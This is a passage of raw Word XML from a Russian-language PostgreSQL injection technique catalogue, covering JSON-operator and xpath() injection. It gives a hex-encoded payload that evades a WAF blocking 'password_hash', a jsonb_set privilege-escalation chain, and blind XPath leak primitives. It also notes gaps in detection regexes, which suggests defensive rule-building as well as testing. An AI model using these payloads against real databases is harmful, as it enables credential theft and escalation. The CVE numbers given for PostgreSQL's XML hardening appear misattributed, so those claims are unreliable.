        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 9.3+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — базовые операторы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235C74B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 12+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — JSONPath (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@@</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@?</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF53A90" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 17+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — JSON_TABLE, новые конструкции; пересмотреть отдельно как они добавляют поверхность.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D469BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed</w:t>
      </w:r>
      <w:r>
        <w:t>: работает идентично.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE9B082" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Связанные паттерны</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7925492F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 (Error-based)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Payload C — комбо. JSONB даёт точку входа, cast-error даёт leak.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267587BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8 (Metadata)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — JSON-документы часто содержат метаданные приложения (роли, permissions); 3.11.2 — канал их извлечения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E51449" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.11.1 (Boolean coercion)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(data-&gt;&gt;'admin')::boolean</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — комбинация двух классов 3.11; cast confusion через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data-&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::boolean</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4047F7F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13 (Privilege escalation)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — JSON-документ часто содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"role": "admin"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-like поля. 3.11.2 + 3.10.1 (CTE UPDATE) — write </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>role</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в jsonb через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>jsonb_set</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в data-modifying CTE, эскалация на application-уровне.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240037C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.5 (decode hex)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — для обхода WAF, блокирующего подстроку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password_hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, в JSONPath: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data-&gt;&gt;convert_from(decode('70617373776F72645F68617368', 'hex'), 'UTF8')</w:t>
      </w:r>
      <w:r>
        <w:t>. Комбинация 3.9.5 + 3.11.2 — обход keyword-blacklist в JSON-path context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376811CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rules.py в DS-workshop2.0 — не покрыто:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> регекса для concat в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>['"][^'"]*['"]\s*\|\|\s*\$</w:t>
      </w:r>
      <w:r>
        <w:t>) и для подозрительных JSONPath-паттернов (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>like_regex</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нет. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Рекомендация:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> см. сводный regex категории 3.11 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>summary-3.11.md</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7FB6C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74938079" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: JSON Functions and Operators</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — все операторы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B4AB26" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: jsonpath Type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — спецификация DSL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0316C120" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: SQL/JSON Path Language</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — grammar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFBA6D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HackerOne — JSON Injection writeups (Postgres)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий контекст.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433B70A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy: NoSQL injection — applicable concepts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — JSONPath-аналог в NoSQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5C8CA8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HackTricks: PostgreSQL Injection — JSON operators</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — практические payload-ы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8CDD67" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.11.3 xpath() и XML-tricks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56168020" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код — см. 3.11.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383E1EF2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Суть</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42360327" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PostgreSQL поддерживает XML через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r>
        <w:t>-тип (PG 8.3+) и набор функций над ним:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D23D5D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`xpath(xpath_expression text, xml_value xml [, nsarray text[]])`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xml[]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — выполняет XPath 1.0-выражение над XML-документом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CEAD48" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`xpath_exists(...)`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — boolean-форма xpath().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDA94BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`xmltable(...)`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>setof record</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — табличный режим, парсит XML и возвращает rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25894B50" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`xmlexists(xpath_expression PASSING xml_value)`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — то же, что xpath_exists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1B136E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`xmlparse(DOCUMENT '...')`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`xmlparse(CONTENT '...')`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — парсинг строки в xml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC534DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`query_to_xml(...)`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`table_to_xml(...)`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`database_to_xml(...)`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — сериализация SQL-результатов в XML (см. 3.8.5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6489A3DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Injection-канал — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XPath 1.0 как user-controlled DSL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. PG использует libxml2 как backend; XPath-engine — стандартный libxml2 XPath 1.0 implementation. XPath 1.0 имеет встроенные функции: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>string()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>string-length()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>substring()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>concat()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>contains()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>starts-with()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>local-name()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>namespace-uri()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>count()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>position()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — всё нужное для blind-leak отдельных байт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5FCA6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ограничения PG-libxml2 (важные для атакующего):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E55E1C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XXE не работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PG передаёт libxml2 флаг </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XML_PARSE_NONET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — запрещает загрузку external entities по URL. CVE-2017-7484 закрыл лазейки; CVE-2021-43795 (XML_PARSE_HUGE) — DoS, не XXE. Тот класс XML-атак, который даёт OOB-канал в Oracle DB и MSSQL, в PG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>закрыт</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42583FF3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XPath 2.0/3.0 не поддерживается.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Только XPath 1.0. Это значит, что нет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-конструкций, нет regex, нет datetime-функций. Но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>string()</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>substring()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> достаточно для leak.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9A16B5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`xpath()` возвращает `xml[]`</w:t>
